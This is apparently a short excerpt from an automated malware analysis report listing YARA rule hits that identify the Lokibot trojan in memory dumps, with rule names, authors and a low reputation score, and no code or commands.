                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000000.389104727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                Reputation:low

                No disassembly